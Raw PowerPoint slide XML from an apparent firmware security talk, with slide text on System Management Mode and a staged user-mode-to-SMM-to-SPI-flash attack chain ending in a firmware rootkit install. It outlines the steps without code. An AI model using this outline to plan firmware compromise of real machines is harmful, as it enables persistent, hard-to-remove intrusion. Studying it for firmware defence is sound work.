            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>System Management Mode overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="Shape 350"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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351" name="Shape 351"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6440199" y="1647724"/>
            <a:ext cx="5200450" cy="4176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356" name="Shape 356"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="Shape 357"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="543200" y="1442200"/>
            <a:ext cx="9672300" cy="4260000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-69850" lvl="0" marL="101600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="55000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="77B82A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Gain full capabilities of executing in SMM:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184400" lvl="1" marL="540000" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Isolation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184400" lvl="1" marL="540000" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Execution in parallel with OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184400" lvl="1" marL="540000" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Full physical memory access and bunch of capabilities to work with hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="101600" rtl="0">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="77B82A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Bypass almost every known UEFI BIOS protection mechanisms (PRx, SMM_BWP/SMM BLE, Signed Updates, OEM-developed Chain-Of-Trust with no hardware Root-Of-Trust)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="55000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="77B82A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>  Survive:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184400" lvl="1" marL="540000" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>OS reinstall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184400" lvl="1" marL="540000" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>HDD replace</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800"/>
              <a:t>\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="Shape 358"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>SMM break-in</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Shape 359"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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364" name="Shape 364"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Shape 365"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839874" y="457925"/>
            <a:ext cx="10149000" cy="82230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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>User mode -&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t> SMM -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>SPI flash</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t> attack scenario</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366" name="Shape 366"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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67" name="Shape 367"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5382500" y="5889175"/>
            <a:ext cx="6037800" cy="370500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Alex Matrosov. The UEFI Firmware Rootkits. Myths And Reality]</a:t>
            </a:r>
          </a:p>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9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>						</a:t>
            </a:r>
          </a:p>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="Shape 368"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651047" y="1530827"/>
            <a:ext cx="8520112" cy="4785926"/>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77B82A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="77B82A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Stage 1 (User-Mode):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Client-side Exloit drop installer (1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Installer Elevate Privileges to System </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="77B82A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Stage 2 (Kernel-Mode):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Bypass code signing policies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Install Kernel-Mode Payload (2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="77B82A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Stage 3 (System Management Mode):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Execute SMM exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Elevate Privileges to SMM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Execute SMM Payload (3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="77B82A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Stage 4 (SPI  Flash):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Bypass Flash Write Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Install Rootkit into Firmware </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="369" name="Shape 369"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
